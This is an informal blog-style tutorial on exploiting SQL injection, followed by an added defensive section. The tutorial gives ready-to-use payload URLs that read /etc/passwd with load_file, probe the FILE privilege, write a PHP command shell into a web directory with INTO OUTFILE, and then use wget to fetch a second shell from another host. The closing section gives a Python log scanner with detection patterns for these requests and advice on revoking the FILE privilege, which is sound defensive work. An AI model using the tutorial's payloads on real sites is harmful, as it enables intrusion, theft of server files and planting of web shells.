Guys, this is laxu here! To start the process, first of all find a website which is vulnerable to SQL
injection. You can find websites by dorks or manually, depending on your
capability!
- Root Path of the website
- A Writable Directory
Most of the time, you will see the root path in the SQL error of that site, like the following example:
” Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/hruday/public_html/functions.php on the line 1327 “
But if the vulnerable website doesn’t show the root path, don’t worry:
I will show you how to find the root path, and also a writable
directory:
” www.site.com/index.php?id=10′ “
I am not starting with the ABCs of SQLi; I hope you know the basics.
Now we have to find the columns of the website, then the vulnerable columns. For example, my site has 5 columns and 3 is the vulnerable column:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5–
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5–
Let’s try to load files of the website:
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/passwd’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/my.cnf’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/group’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/services’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/hosts’),4,5–
We won’t need to read any of the files mentioned above; they are just to increase
your knowledge. Now we have to check the file privileges for the current
user. For this, you first have to find the current username.
Like this:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5–
This gives the current username; mine is HrudayCharan.
Now check the file privileges for user HrudayCharan:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user=’HrudayCharan’–
If it shows Y (yes) in the vulnerable column of the website, that means we have the file privileges for the current user HrudayCharan.
And if it doesn’t show Y, then don’t waste your time there.
OK, now we need to know the root path for this web server. For
this information we need to know the web server type. For this you can use
the Firefox add-on Server Spy.
Server Spy add-on: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use Havij and some other tools too to detect the web server type. To know the web server from the file /etc/passwd, use this query:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file(‘/etc/passwd’),5–
Now we have our web server, etc. (/home/Hruday).
Now read one more file:
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘etc/HrudayCharan.conf’)4,5–
Here HrudayCharan is your web server software name, like servername.conf.
Now we have obtained the root path:
/home/site.com/public_html etc.
Now we have to find a writable directory. For this you can use Google dorks as well as your own knowledge:
site www.site.com/dir/*/*/*/*/
So site.com/Hruday is writable.
Now we will upload our evil code:
” www.site.com/index.php?id=10 UniOn SeleCt 1,2,”<?system($_REQUEST[‘cmd’]);?>”,4,5 into outfile ‘/home/site/public_html/Hruday/’WRITABLE_DIRECTORY’/hny.php’–+ “
OK, now we have to execute our commands:
” www.site.com/writeable_directory/hny.php?cmd=pwd ” OR
” COMMANDS YOU BASICALLY USE IN LINUX “
Now we will use the wget command to upload our evil script: 3:) The Evil Attempt
” www.site.com/writeable_directory/hny.php?cmd=wget http://site.com/honey.txt -O honey.php”
Now open it. You are ready! Go here: www.site.com/WRITABLE_directory/honey.php and enjoy the shell. Thanks, and stay updated with the blog.
./signing off
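
For defenders, every stage of this walkthrough leaves a recognizable request in the web server access log. The following is an added example, not part of the original post: a Python scanner over constructed Apache-style log lines that flags the UNION SELECT, load_file, file_priv lookup, INTO OUTFILE and `cmd` parameter requests described above. The rule names, sample IPs and placeholder paths are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# One rule per stage of the walkthrough; case-insensitive because the
# requests mix case ("UniOn SeleCt"). Rule names are illustrative.
RULES = [
    ("union_select", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("load_file", re.compile(r"load_file\s*\(", re.I)),
    ("file_priv_probe", re.compile(r"file_priv|mysql\.user", re.I)),
    ("into_outfile", re.compile(r"into\s+(?:out|dump)file", re.I)),
    ("cmd_param", re.compile(r"\.php\?cmd=", re.I)),
]
# Apache common/combined log prefix: ip, ident, user, [time], "METHOD URI PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def normalize(uri):
    """Undo single or double URL-encoding and SQL inline comments used as spaces."""
    for _ in range(2):
        uri = unquote_plus(uri)
    return re.sub(r"/\*.*?\*/", " ", uri)

def scan(lines):
    """Return (client_ip, status, [rule names]) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        ip, uri, status = m.groups()
        hits = [name for name, rx in RULES if rx.search(normalize(uri))]
        if hits:
            findings.append((ip, int(status), hits))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder paths).
SAMPLE = [
    '203.0.113.5 - - [10/Jan/2024:10:00:00 +0000] "GET /index.php?id=10 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2024:10:01:00 +0000] "GET /index.php?id=-10+UniOn+SeleCt+1,2,load_file(%27/etc/passwd%27),4,5--+ HTTP/1.1" 200 1840',
    '198.51.100.7 - - [10/Jan/2024:10:02:00 +0000] "GET /index.php?id=-10%20UNION/**/SELECT%201,2,file_priv,4,5%20FROM%20mysql.user--+ HTTP/1.1" 200 530',
    '198.51.100.7 - - [10/Jan/2024:10:03:00 +0000] "GET /index.php?id=10%2520union%2520select%25201,2,3,4,5%2520into%2520outfile%2520%2527/PLACEHOLDER/x.php%2527--+ HTTP/1.1" 200 0',
    '198.51.100.7 - - [10/Jan/2024:10:04:00 +0000] "GET /PLACEHOLDER/x.php?cmd=pwd HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE):
        print(ip, status, ",".join(hits))
```

On the database side, the file read and write steps only work when the application’s MySQL account holds the FILE privilege, so revoking it and restricting `secure_file_priv` removes them even where the injection itself is still present.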